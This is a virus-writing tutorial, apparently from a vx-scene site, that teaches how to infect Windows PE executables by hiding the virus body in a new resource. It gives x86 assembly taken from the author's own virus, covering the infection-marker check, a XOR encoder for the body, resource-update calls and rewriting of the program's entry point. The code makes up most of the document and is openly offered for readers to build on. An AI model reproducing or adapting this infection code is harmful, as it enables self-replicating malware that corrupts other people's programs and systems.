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Infecting PE files by adding new resource

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Infecting PE files by adding new resource

Author: Berniee/Fakedminded


Making a pe appender is done by various ways adding new section,increasing

last section or any other ways.

Here I will explain infecting pe file by adding new resource which will contain our

code.The infecting code is taken from my previous virus "fag".

NOTE:May be the following is to some point is un-understandable for some ,because

I tried to present the method as an idea and not as explaining it in depth! .


The thing behind all this is getting the job (infection) by easiest way,may be there are

other ways,but that was the easiest on for me as I started. The method use :




which are all from kernel32.dll


First thing we will load the file by LoadLibrary function,so as to use FindReseource()to see if ourvirus is already there in that exe file.By checking the resource name

which is is 123 type RT_RCDATA in this demonstartion ,if it was there we just abort

infection,you may find other ways to check for the virus infection use your imagination.



mov [ebp+offset v_file],eax
push [ebp+offset v_file]
call [ebp+offset ALoadLibraryF]
or eax,eax
jz exit_nfkt
mov [ebp+offset bwr],eax ;note I used the variable bwr
;so as not increasing no. of variables in use

push 1234
push [ebp+offset bwr]
call [ebp+offset AFindResourceF];checking the virus presence,not found proceed infection.
or eax,eax
jnz exit_nfkt

-----------------END OF CODE--------------

Then we we go on checking if it is pe! .

After that we go and we make another check for resource by checking Res. Directory

address if it is zeroed or not(can be omitted since we already checked it by res. func)


cmp dword ptr [esi+136],0

je exit_nfkt


Next we save image base and the old_eip(old entry point).

Then FreeLibrary after getting the info. required (image base & entry point)


mov esi,dword ptr [ebp+offset bwr]
cmp word ptr [esi],"ZM"
jne exit_nfkt

add esi,[esi+3ch]
cmp word ptr [esi],"EP"
jne exit_nfkt

cmp dword ptr [esi+136],0
je exit_nfkt

mov eax,[esi+40]
mov ebx,[esi+52]
mov [ebp+offset image_base],ebx
mov [ebp+offset old_eip],eax

push [ebp+offset bwr]
call [ebp+offset AFreeLibraryF]

-----------------END OF CODE--------------

.Pursuing Infection

Now After we checked the file has not been yet infected and after taking two variables

(image base and old entrypoint).We continue in our goal infection by addinf new resource.

The followinf functions have the major role:

1-HANDLE BeginUpdateResource

( LPCTSTR pFileName,

BOOL bDeleteExistingResources


as you can see the function needs the name of file-->the victive file

and the other option is to tell us if we want all the resources to be deleted

and replaced by ours or just add the new resources of ours,choose FLASE

because we dont want to remove icon and other resources of that file.this function

will return a handle that we save by pushing to stack inthe code below .

2-BOOL UpdateResource(

HANDLE hUpdate,



WORD wLanguage,

LPVOID lpData,

DWORD cbData


Handle, our handle from BeginUpdateResource

lpType,RT_RCDATA that what we need no icons

lpName,1234 the name you can choose whatever names you want


lpData,pointer to our virus body

cbData,size of our virus..

3-BOOL EndUpdateResource(

HANDLE hUpdate,

BOOL fDiscard


handle,we just pop from the stack of the previous saved handle.

fDiscard,we put it FALSE announcing the changing to be done

see next code.

[ the following code has a simple xor encoder( "fag" virus ) ]


push vir_size
push 0
call dword ptr [ebp+offset AGlobalAllocF] ;allocate enough memory for our encrypted vir
or eax,eax
je exit_nfkt

mov [ebp+offset v_mem],eax
mov esi,offset Start
add esi,ebp
mov edi,[ebp+offset v_mem]

mov ecx,vir_size
rep movsb

mov ecx,vir_size
sub ecx,stub_size
mov eax,[ebp+offset v_mem]
add eax,stub_size

xor byte ptr [eax],12 ;simple encryption by xor
inc eax
loop _encrypt

push FALSE
push [ebp+offset v_file]

call dword ptr [ebp+offset ABeginUpdateResourceF] ;starting our res. based infection (see
;above about the functions,which was
or eax,eax
jz exit_nfkt
push eax

push [ebp+offset v_mem]

push 1234
push eax
call dword ptr [ebp+offset AUpdateResourceF] ;adding the RT_RCDATA 1234 resource
or eax,eax
jz exit_nfkt

pop eax
push FALSE
push eax
call dword ptr [ebp+AEndUpdateResourceF] ;ending our resource update
or eax,eax
jz exit_nfkt

-----------------END OF CODE--------------

.Fixing EntryPoint

You may have noticed that I didnt use epo in "fag" virus,so I had to change the old entry

point .Here using a rather lame method:

Opening the file and finding out where the hell our code goes and how many offsets

is it far from .res section physical offset to add .res section Virtual Address to

its offset from it to get the new entry point.

see code :


push 0
push 0
push 3
push 0
push 2h
push 40000000h or 80000000h

push [ebp+offset v_file]

call dword ptr [ebp+offset ACreateFileF]
or eax,eax
jz exit

mov [ebp+offset v_filehandle],eax

push 0
push eax
call dword ptr [ebp+offset AGetFileSizeF]
or eax,eax
jz exit_nfkt
mov dword ptr [ebp+offset v_size ],eax

push eax
push 0
call dword ptr [ebp+offset AGlobalAllocF]
or eax,eax
jz exit_nfkt
mov dword ptr [ebp+offset v_mem],eax

push 0

mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset v_size]
push dword ptr [ebp+offset v_mem]

push dword ptr [ebp+offset v_filehandle]
call dword ptr [ebp+offset AReadFileF]
or eax,eax
jz exit_nfkt

mov esi,dword ptr [ebp+offset v_mem]
cmp word ptr [esi],"ZM"
jne exit_nfkt

add esi,[esi+3ch]
cmp word ptr [esi],"EP"
jne exit_nfkt
push esi

xor ecx,ecx
xor ebx,ebx
mov bx,word ptr [esi+20] ;ebx size of optional header
mov cx,word ptr [esi+6] ;ecx no. of sections

add esi,24
add esi,ebx

xor ebx,ebx
cmp dword ptr [esi],"rsr."
je found_rsrc
add esi,40
loop l00p_rsrc
jmp exit_nfkt

mov ecx,[esi+16]
mov esi,[esi+20]
add esi,[ebp+offset v_mem]
push ecx

-----------------END OF CODE--------------

here take a break,see that I put a marker in virus body at the beginning

(notice in original virus--with all its contents--)

so I check this marker to know the offset of my virus body away from

from .res section begining.


cmp word ptr [esi],'kcik'
je here_vir
inc esi
loop l00p_marker

pop edx
sub edx,ecx
sub edx,2

pop edi

add edx,dword ptr [edi+136]
mov dword ptr [edi+40],edx ;new entry point

push 0
push 0
push dword ptr [ebp+offset v_filehandle]
call dword ptr [ebp+offset ASetFilePointerF]

push 0

mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset v_size]
push dword ptr [ebp+offset v_mem]

push dword ptr [ebp+offset v_filehandle]
call dword ptr [ebp+offset AWriteFileF]



-----------------END OF CODE--------------

Now what we all need is to take the old entry point and add image base to it

and jmp to it.

I left other things like getting kernel base and other needed functions

because as I said I only wanted to present the method of infection and the other

things are left to be done by you.


If you you have any comments feedbacks or curses just contacting me through eof-project

site or throught my site ,If you ever felt this method is lame or unworthy reading !

just forget about it and move on in your coding life and dont blame me of the time you

and me wasted,and remember shitting also take time from your life :\ .

Note :: Recently I have found some bugs regarding fag-virus,so the above tutorial represent

idea rather than copy-paste code...

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